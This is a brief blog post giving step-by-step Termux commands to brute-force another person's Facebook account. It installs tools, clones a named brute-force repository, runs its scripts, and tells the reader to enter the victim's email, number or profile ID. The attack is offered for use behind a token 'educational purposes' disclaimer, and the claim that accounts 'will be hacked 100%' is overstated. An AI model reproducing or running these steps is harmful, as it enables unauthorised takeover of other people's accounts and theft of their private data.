WANNA HACK A FACEBOOK ACCOUNT?

To hack a facebook account you need to download Termux.It is an android app. You can find it on play store.If you are using termux for first time then you need to install some tools on it first.Now let’s open termux and start installing them.Type my commands.

1) apt update
2) y
3) apt upgrade
4) y
apt install python
5) y
6) apt install python2
7) y
8) apt install git
9) y

Now you are ready to start hacking with Termux

(Note:Hacking is illegal. This post is only for educational purposes.I and my blog is not responsible fir any kind of misuse of it)

Today we will talk about bruteforce attack.So what is bruteforce?

Bruteforce is a kind of attack that tries all the possible password one by one until it matches the real password.So now you may understand that the facebook account will be hacked 100% but it will take very much time.Depends when the guesed password and the exact passwords matches.So to start bruteforce with termux type my commands.


  • git clone https://github.com/IAmBlackHacker/Facebook-BruteForce
  • cd Facebook-BruteForce
  • pip3 install requests bs4
  • pip install mechanize
  • python3 fb.py or python fb2.py

Now give the email address or number or his profile id and start hacking.Thanks for reading the post.Comment for any help.